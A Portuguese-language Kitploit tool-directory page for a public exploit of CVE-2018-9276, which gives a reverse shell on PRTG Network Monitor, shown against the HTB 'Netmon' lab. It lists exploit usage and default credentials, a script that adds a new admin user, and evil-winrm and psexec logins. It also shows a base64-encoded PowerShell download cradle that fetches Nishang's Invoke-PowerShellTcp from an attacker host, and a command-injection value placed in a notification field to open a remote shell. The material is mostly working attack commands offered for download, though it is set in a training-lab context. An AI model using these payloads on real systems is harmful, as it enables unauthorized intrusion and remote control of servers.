Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-9276 — CVE-2018-9276 PRTG < 18.2.39 Shell reverso (suporte a Python3) | Kitploit
Ferramentas/GitHubGitHub/alvinsmith-eroad/cve-2018-9276
Geração de PayloadsExploraçãoMovimento LateralExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubalvinsmith-eroad/cve-2018-9276

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Shell reverso (suporte a Python3)

Ver Repositório
2há 5 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-9276

CVE-2018-9276 PRTG < 18.2.39 Reverse Shell (suporte a Python3)

Dependências

  • Impacket (versão python3)
  • Netcat
  • Msfvenom

Uso

root@kitploit:~
git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass
  1. As credenciais são necessárias para realizar o exploit. Tente as credenciais padrão prtgadmin:prtgadmin. E pode valer a pena verificar o banco de dados ou o log para obtê-las. https://kb.paessler.com/en/topic/463-how-and-where-does-prtg-store-its-data
  2. Tente --lport 445 se a porta não estiver ocupada.
  3. Há alguns comentários confusos no código. Eles podem precisar de algumas modificações.
  4. Podem ser necessárias algumas tentativas para ter sucesso. Reiniciar a máquina alvo é sempre uma boa opção, especialmente quando o seu payload causa algum impacto.

Cobertura de teste

Máquina Netmon do HTB

root@kitploit:~
OS Name:                   Microsoft Windows Server 2016 Standard
OS Version:                10.0.14393 N/A Build 14393
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   
Product ID:                00376-30821-30176-AA362
Original Install Date:     2/3/2019, 7:05:45 AM
System Boot Time:          7/28/2021, 9:02:41 PM
System Manufacturer:       VMware, Inc.
System Model:              VMware Virtual Platform
System Type:               x64-based PC

Créditos

Um grande agradecimento a wildkindcc pela versão python2 https://github.com/wildkindcc/CVE-2018-9276

Expandir Conhecimento

Usando o metasploit

https://www.rapid7.com/db/modules/exploit/windows/http/prtg_authenticated_rce/

Execução Remota de Código

https://www.exploit-db.com/exploits/46527

https://github.com/chcx/PRTG-Network-Monitor-RCE

Exemplo de uso

As credenciais são necessárias para realizar o exploit. Primeiro faça login e obtenha o cookie autenticado para adicionar um novo usuário.

root@kitploit:~
./prtg-exploit.sh -u http://10.10.10.10 -c "OCTOPUS1813713946=XXX"

// Login as the new user via evil-winrm
evil-winrm -i 10.10.10.10 -u pentest -p 'P3nT3st!'
// or alternative psexec.py
python3 /path/etc/impacket/examples/psexec.py pentest:'P3nT3st!'@10.10.10.10

Screen Shot 2021-07-29 at 3 14 10 PM

Exploit manual avançado sem adicionar um novo usuário

O crédito pertence ao writeup oficial do HTB
POC: https://www.codewatch.org/blog/?p=453 Além de usar SMB para obter reverse shell https://github.com/A1vinSmith/OSCP-PWK/wiki/Samba-SMB

Caso não queiramos adicionar um usuário, para uma melhor OPSEC podemos obter um reverse shell. No entanto, devido à codificação HTML, muitos caracteres são codificados. Podemos contornar isso usando execução base64 do powershell. Precisamos criar um comando codificado em base64. Porém, ele deve estar na codificação que o Windows usa, ou seja, UTF-16LE

root@kitploit:~
❯ echo -n "IEX(new-object net.webclient).downloadstring('http://10.10.10.100/Invoke-PowerShellTcp.ps1' )" | iconv -t UTF-16LE | base64 -w0

SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

Usamos o iconv para converter para a codificação alvo e executaremos este reverse shell do Nishang. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

Baixe o script e adicione o comando na última linha.

root@kitploit:~
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

echo 'Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.100 -Port 4444' >> Invoke-PowerShellTcp.ps1

Agora inicie um servidor HTTP simples e crie uma nova notificação

root@kitploit:~
python3 -m http.server 80

Clique em Setup > Account Settings > Notifications -> clique em “Add new notification” no extremo direito Dispare a notificação clicando no botão do sino

root@kitploit:~
abc.txt | powershell -enc SQBFAFgAKABu...SNIP...HMAMQAnACAAKQA= 

Screen Shot 2021-07-29 at 4 08 01 PM

Baixar ferramenta